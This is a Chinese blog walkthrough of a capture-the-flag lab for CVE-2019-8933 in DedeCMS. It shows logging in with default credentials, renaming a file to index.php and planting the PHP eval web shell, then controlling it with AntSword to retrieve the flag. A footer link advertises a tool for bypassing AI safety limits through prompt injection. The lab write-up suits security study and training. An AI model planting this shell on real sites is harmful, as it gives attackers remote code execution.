春秋云境CVE-2019-8933

1.阅读靶场介绍

这里我们能得到的信息就是

将文件名../index.html更改成../index.php应用该漏洞向uploads/目录上传.php文件并执行该文件。

简单来说就是在后台把index.html的文件改为index.php并且修改内容为

<?php @eval($_POST['cmd']);?>

然后就可以完成webshell了

2.启动靶场

如下图所示

博主这里是把靶场介绍喂给ai得到的后台路径

直接在路径拼接/dede这个就会跳转到登入页面

如下图所示

账号/密码是admin/admin

进入后台以后我们点击这个文件式管理器

右边有一个index.html我们点击编辑

会出现下述页面

这里要修改一下文件名称和内容

index.php

<?php @eval($_POST['cmd']);?>

保存即可

然后访问

出现一片空白的就是对的

下面这个是url

https://eci-2ze1zd9kizhz7f10jpim.cloudeci1.ichunqiu.com/uploads/index.php

最后就是启动中国蚁剑

输入url和木马的密码

我们就可以完成webshell了

这里我们就可以找到flag

感谢您宝贵的时间

喜欢博主的作品可以点赞支持支持哟

相关推荐
无心水6 小时前
【Hermes:安全、权限与生产环境】40、运行 Hermes 前的生命线:安全审计清单与 11 个必须检查的配置项
人工智能·安全·mcp协议·openclaw·养龙虾·hermes·honcho
@insist1239 小时前
信息安全工程师-测评核心知识框架与关键流程(上篇)
安全·软考·信息安全工程师·软件水平考试
lifejump9 小时前
Empire(帝国)CMS 7.5 XSS注入
前端·安全·xss
xixixi7777710 小时前
AI的“账号”与“钱包”:AWS与Circle同日出手,AI正从工具进化
人工智能·安全·ai·大模型·云计算·aws
JiaWen技术圈10 小时前
Web 安全深入审计检查清单
前端·安全
lifejump12 小时前
Dede(织梦)CMS渗透测试(all)
前端·网络·安全·web安全
星幻元宇VR12 小时前
VR文旅大空间|沉浸式体验重塑文旅新场景
科技·学习·安全·vr·虚拟现实
紫金桥软件12 小时前
组态软件新势力,安全可靠高性能经多行业认证紫金桥软件RealSCADA
安全·scada·组态软件·国产工业软件·监控组态软件
HKT_China12 小时前
物联网安全管理方案 助力企业实施智慧安全管理
物联网·安全·数字化转型
HackTwoHub13 小时前
AI提示词注入绕过工具:一键绕过Codex/Claude安全限制,CTF夺旗与渗透测试必备神器
网络·人工智能·安全·web安全·系统安全·网络攻击模型·安全架构